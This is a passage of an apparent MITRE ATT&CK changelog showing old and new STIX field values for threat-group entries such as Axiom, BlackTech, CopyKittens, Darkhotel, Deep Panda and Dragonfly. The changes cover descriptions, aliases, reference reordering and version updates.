| external_references[6]['url'] | https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html | https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do |
| external_references[7]['source_name'] | CrowdStrike Silent Chollima Adversary September 2021 | IssueMakersLab Andariel GoldenAxe May 2017 |
| external_references[7]['description'] | CrowdStrike. (2021, September 29). Silent Chollima Adversary Profile. Retrieved September 29, 2021. | IssueMakersLab. (2017, May 1). Operation GoldenAxe. Retrieved September 29, 2021. |
| external_references[7]['url'] | https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/ | http://www.issuemakerslab.com/research3/ |
| Old Description | New Description |
|---|---|
| [Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) | [Axiom](https://attack.mitre.org/groups/G0001) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://attack.mitre.org/groups/G0001) and [Winnti Group](https://attack.mitre.org/groups/G0044) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 18:52:38.226000+00:00 | 2022-04-15 15:52:00.359000+00:00 |
| description | [Axiom](https://attack.mitre.org/groups/G0001) is a cyber espionage group suspected to be associated with the Chinese government. It is responsible for the Operation SMN campaign. (Citation: Novetta-Axiom) Though both this group and [Winnti Group](https://attack.mitre.org/groups/G0044) use the malware [Winnti for Windows](https://attack.mitre.org/software/S0141), the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting. (Citation: Kaspersky Winnti April 2013) (Citation: Kaspersky Winnti June 2015) (Citation: Novetta Winnti April 2015) | [Axiom](https://attack.mitre.org/groups/G0001) is a suspected Chinese cyber espionage group that has targeted the aerospace, defense, government, manufacturing, and media sectors since at least 2008. Some reporting suggests a degree of overlap between [Axiom](https://attack.mitre.org/groups/G0001) and [Winnti Group](https://attack.mitre.org/groups/G0044) but the two groups appear to be distinct based on differences in reporting on TTPs and targeting.(Citation: Kaspersky Winnti April 2013)(Citation: Kaspersky Winnti June 2015)(Citation: Novetta Winnti April 2015) |
| external_references[1]['source_name'] | Axiom | Group 72 |
| external_references[1]['description'] | (Citation: Novetta-Axiom) | (Citation: Cisco Group 72) |
| external_references[2]['source_name'] | Group 72 | Axiom |
| external_references[2]['description'] | (Citation: Cisco Group 72) | (Citation: Novetta-Axiom) |
| external_references[3]['source_name'] | Novetta-Axiom | Cisco Group 72 |
| external_references[3]['description'] | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. | Esler, J., Lee, M., and Williams, C. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016. |
| external_references[3]['url'] | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf | http://blogs.cisco.com/security/talos/threat-spotlight-group-72 |
| external_references[5]['source_name'] | Kaspersky Winnti June 2015 | Novetta Winnti April 2015 |
| external_references[5]['description'] | Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016. | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. |
| external_references[5]['url'] | https://securelist.com/games-are-over/70991/ | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf |
| external_references[6]['source_name'] | Novetta Winnti April 2015 | Novetta-Axiom |
| external_references[6]['description'] | Novetta Threat Research Group. (2015, April 7). Winnti Analysis. Retrieved February 8, 2017. | Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014. |
| external_references[6]['url'] | http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf | http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf |
| external_references[7]['source_name'] | Cisco Group 72 | Kaspersky Winnti June 2015 |
| external_references[7]['description'] | Esler, J., Lee, M., and Williams, C.. (2014, October 14). Threat Spotlight: Group 72. Retrieved January 14, 2016. | Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016. |
| external_references[7]['url'] | http://blogs.cisco.com/security/talos/threat-spotlight-group-72 | https://securelist.com/games-are-over/70991/ |
| x_mitre_version | 1.2 | 2.0 |
| Old Description | New Description |
|---|---|
| [BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017) | [BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/ |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-20 17:57:07.909000+00:00 | 2022-04-06 13:14:27.477000+00:00 |
| description | [BlackTech](https://attack.mitre.org/groups/G0098) is a cyber espionage group operating against targets in East Asia, particularly Taiwan, and occasionally, Japan and Hong Kong.(Citation: TrendMicro BlackTech June 2017) | [BlackTech](https://attack.mitre.org/groups/G0098) is a suspected Chinese cyber espionage group that has primarily targeted organizations in East Asia--particularly Taiwan, Japan, and Hong Kong--and the US since at least 2013. [BlackTech](https://attack.mitre.org/groups/G0098) has used a combination of custom malware, dual-use tools, and living off the land tactics to compromise media, construction, engineering, electronics, and financial company networks.(Citation: TrendMicro BlackTech June 2017)(Citation: Symantec Palmerworm Sep 2020)(Citation: Reuters Taiwan BlackTech August 2020) |
| external_references[1]['source_name'] | TrendMicro BlackTech June 2017 | Palmerworm |
| external_references[1]['description'] | Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020. | (Citation: Symantec Palmerworm Sep 2020)(Citation: IronNet BlackTech Oct 2021) |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | Palmerworm | |
| external_references | {'source_name': 'TrendMicro BlackTech June 2017', 'description': 'Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.', 'url': 'https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/'} | |
| external_references | {'source_name': 'IronNet BlackTech Oct 2021', 'description': 'Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.', 'url': 'https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape'} | |
| external_references | {'source_name': 'Reuters Taiwan BlackTech August 2020', 'description': 'Lee, Y. (2020, August 19). Taiwan says China behind cyberattacks on government agencies, emails. Retrieved April 6, 2022.', 'url': 'https://www.reuters.com/article/us-taiwan-cyber-china/taiwan-says-china-behind-cyberattacks-on-government-agencies-emails-idUSKCN25F0JK'} | |
| external_references | {'source_name': 'Symantec Palmerworm Sep 2020', 'description': 'Threat Intelligence. (2020, September 29). Palmerworm: Espionage Gang Targets the Media, Finance, and Other Sectors. Retrieved March 25, 2022.', 'url': 'https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/palmerworm-blacktech-espionage-apt'} | |
| x_mitre_contributors | Hannah Simes, BT Security |
| Description |
|---|
| [Chimera](https://attack.mitre.org/groups/G0114) is a suspected China-based threat group that has been active since at least 2018 targeting the semiconductor industry in Taiwan as well as data from the airline industry.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 21:53:00.909000+00:00 | 2022-03-25 19:35:55.074000+00:00 |
| Description |
|---|
| [Cleaver](https://attack.mitre.org/groups/G0003) is a threat group that has been attributed to Iranian actors and is responsible for activity tracked as Operation Cleaver. (Citation: Cylance Cleaver) Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 (TG-2889). (Citation: Dell Threat Group 2889) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 19:34:36.092000+00:00 | 2022-07-22 18:37:22.178000+00:00 |
| Old Description | New Description |
|---|---|
| [CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015) | [CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.(Citation: ClearSky CopyKittens March 2017)(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-26 12:32:58.912000+00:00 | 2022-08-08 21:29:36.462000+00:00 |
| description | [CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015) | [CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip.(Citation: ClearSky CopyKittens March 2017)(Citation: ClearSky Wilted Tulip July 2017)(Citation: CopyKittens Nov 2015) |
| external_references[2]['source_name'] | ClearSky CopyKittens March 2017 | ClearSky Wilted Tulip July 2017 |
| external_references[2]['description'] | ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017. | ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017. |
| external_references[2]['url'] | http://www.clearskysec.com/copykitten-jpost/ | http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf |
| external_references[3]['source_name'] | ClearSky Wilted Tulip July 2017 | ClearSky CopyKittens March 2017 |
| external_references[3]['description'] | ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017. | ClearSky Cyber Security. (2017, March 30). Jerusalem Post and other Israeli websites compromised by Iranian threat agent CopyKitten. Retrieved August 21, 2017. |
| external_references[3]['url'] | http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf | http://www.clearskysec.com/copykitten-jpost/ |
| x_mitre_version | 1.5 | 1.6 |
| Description |
|---|
| [Darkhotel](https://attack.mitre.org/groups/G0012) is a suspected South Korean threat group that has targeted victims primarily in East Asia since at least 2004. The group's name is based on cyber espionage operations conducted via hotel Internet networks against traveling executives and other select guests. [Darkhotel](https://attack.mitre.org/groups/G0012) has also conducted spearphishing campaigns and infected victims through peer-to-peer and file sharing networks.(Citation: Kaspersky Darkhotel)(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft Digital Defense FY20 Sept 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-22 17:37:58.136000+00:00 | 2022-10-19 22:07:30.243000+00:00 |
| external_references[3]['source_name'] | Kaspersky Darkhotel | Securelist Darkhotel Aug 2015 |
| external_references[3]['description'] | Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014. | Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018. |
| external_references[3]['url'] | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf | https://securelist.com/darkhotels-attacks-in-2015/71713/ |
| external_references[4]['source_name'] | Securelist Darkhotel Aug 2015 | Kaspersky Darkhotel |
| external_references[4]['description'] | Kaspersky Lab's Global Research & Analysis Team. (2015, August 10). Darkhotel's attacks in 2015. Retrieved November 2, 2018. | Kaspersky Lab's Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014. |
| external_references[4]['url'] | https://securelist.com/darkhotels-attacks-in-2015/71713/ | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf |
| external_references[6]['source_name'] | Microsoft DUBNIUM June 2016 | Microsoft DUBNIUM July 2016 |
| external_references[6]['description'] | Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021. | Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021. |
| external_references[6]['url'] | https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/ | https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/ |
| external_references[8]['source_name'] | Microsoft DUBNIUM July 2016 | Microsoft DUBNIUM June 2016 |
| external_references[8]['description'] | Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021. | Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021. |
| external_references[8]['url'] | https://www.microsoft.com/security/blog/2016/07/14/reverse-engineering-dubnium-stage-2-payload-analysis/ | https://www.microsoft.com/security/blog/2016/06/09/reverse-engineering-dubnium-2/ |
| x_mitre_version | 2.0 | 2.1 |
| Description |
|---|
| [Deep Panda](https://attack.mitre.org/groups/G0009) is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications. (Citation: Alperovitch 2014) The intrusion into healthcare company Anthem has been attributed to [Deep Panda](https://attack.mitre.org/groups/G0009). (Citation: ThreatConnect Anthem) This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther. (Citation: RSA Shell Crew) [Deep Panda](https://attack.mitre.org/groups/G0009) also appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion. (Citation: Symantec Black Vine) Some analysts track [Deep Panda](https://attack.mitre.org/groups/G0009) and [APT19](https://attack.mitre.org/groups/G0073) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China's Espionage Jul 2016) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-02-09 13:49:09.605000+00:00 | 2022-07-20 20:10:29.593000+00:00 |
| external_references[7]['url'] | https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/ | https://web.archive.org/web/20200424075623/https:/www.crowdstrike.com/blog/deep-thought-chinese-targeting-national-security-think-tanks/ |
| external_references[8]['source_name'] | ThreatConnect Anthem | Symantec Black Vine |
| external_references[8]['description'] | ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016. | DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016. |
| external_references[8]['url'] | https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ | https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf |
| external_references[10]['source_name'] | Symantec Black Vine | ICIT China's Espionage Jul 2016 |
| external_references[10]['description'] | DiMaggio, J.. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016. | Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018. |
| external_references[10]['url'] | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf | https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/ |
| external_references[11]['source_name'] | ICIT China's Espionage Jul 2016 | ThreatConnect Anthem |
| external_references[11]['description'] | Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018. | ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016. |
| external_references[11]['url'] | https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/ | https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/ |
| Old Description | New Description |
|---|---|
| [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus to include the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019) A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY ) | [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Dragos Threat Intelligence'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack', 'ics-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf | |
| external_references | https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector | |
| external_references | https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-12 22:07:18.072000+00:00 | 2022-10-19 22:09:02.443000+00:00 |
| description | [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus to include the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019) A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY ) | [Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been attributed to Russia's Federal Security Service (FSB) Center 16.(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) Active since at least 2010, [Dragonfly](https://attack.mitre.org/groups/G0035) has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.(Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)(Citation: Symantec Dragonfly 2.0 October 2017) |
| external_references[1]['source_name'] | Dragonfly | DYMALLOY |
| external_references[1]['description'] | (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019) | (Citation: Dragos DYMALLOY )(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[2]['source_name'] | TG-4192 | Berserk Bear |
| external_references[2]['description'] | (Citation: Secureworks IRON LIBERTY July 2019) | (Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[3]['source_name'] | Crouching Yeti | TEMP.Isotope |
| external_references[3]['description'] | (Citation: Secureworks IRON LIBERTY July 2019) | (Citation: Mandiant Ukraine Cyber Threats January 2022)(Citation: Gigamon Berserk Bear October 2021) |
| external_references[4]['source_name'] | IRON LIBERTY | Crouching Yeti |
| external_references[4]['description'] | (Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019) | (Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[5]['source_name'] | Energetic Bear | IRON LIBERTY |
| external_references[5]['description'] | (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019) | (Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[6]['source_name'] | Symantec Dragonfly | TG-4192 |
| external_references[6]['description'] | Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016. | (Citation: Secureworks IRON LIBERTY July 2019)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[7]['source_name'] | Secureworks IRON LIBERTY July 2019 | Dragonfly |
| external_references[7]['description'] | Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020. | (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[8]['source_name'] | Symantec Dragonfly Sept 2017 | Energetic Bear |
| external_references[8]['description'] | Symantec Security Response. (2017, September 6). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017. | (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)(Citation: Secureworks MCMD July 2019)(Citation: Secureworks Karagany July 2019)(Citation: Gigamon Berserk Bear October 2021)(Citation: DOJ Russia Targeting Critical Infrastructure March 2022)(Citation: UK GOV FSB Factsheet April 2022) |
| external_references[9]['source_name'] | Fortune Dragonfly 2.0 Sept 2017 | CISA AA20-296A Berserk Bear December 2020 |
| external_references[9]['description'] | Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. | CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021. |
| external_references[9]['url'] | http://fortune.com/2017/09/06/hack-energy-grid-symantec/ | https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions |
| external_references[10]['source_name'] | Dragos DYMALLOY | DOJ Russia Targeting Critical Infrastructure March 2022 |
| external_references[10]['description'] | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. | Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022. |
| external_references[10]['url'] | https://www.dragos.com/threat/dymalloy/ | https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical |
| external_references[11]['source_name'] | Secureworks MCMD July 2019 | Dragos DYMALLOY |
| external_references[11]['description'] | Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020. | Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020. |
| external_references[11]['url'] | https://www.secureworks.com/research/mcmd-malware-analysis | https://www.dragos.com/threat/dymalloy/ |
| external_references[12]['source_name'] | Secureworks Karagany July 2019 | Fortune Dragonfly 2.0 Sept 2017 |
| external_references[12]['description'] | Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020. | Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018. |
| external_references[12]['url'] | https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector | http://fortune.com/2017/09/06/hack-energy-grid-symantec/ |
| x_mitre_version | 2.1 | 3.1 |
| STIX Field | Old value | New value |
|---|---|---|
| aliases | TEMP.Isotope | |
| aliases | DYMALLOY | |
| aliases | Berserk Bear | |
| external_references | {'source_name': 'Mandiant Ukraine Cyber Threats January 2022', 'description': 'Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.', 'url': 'https://www.mandiant.com/resources/ukraine-crisis-cyber-threats'} | |
| external_references | {'source_name': 'Secureworks MCMD July 2019', 'description': 'Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.', 'url': 'https://www.secureworks.com/research/mcmd-malware-analysis'} | |
| external_references | {'source_name': 'Secureworks IRON LIBERTY July 2019', 'description': 'Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.', 'url': 'https://www.secureworks.com/research/resurgent-iron-liberty-targeting-energy-sector'} | |
| external_references | {'source_name': 'Secureworks Karagany July 2019', 'description': 'Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.', 'url': 'https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector'} | |
| external_references | {'source_name': 'Gigamon Berserk Bear October 2021', 'description': 'Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.', 'url': 'https://vblocalhost.com/uploads/VB2021-Slowik.pdf'} | |
| external_references | {'source_name': 'Symantec Dragonfly Sept 2017', 'description': 'Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.', 'url': 'https://docs.broadcom.com/doc/dragonfly_threat_against_western_energy_suppliers'} | |
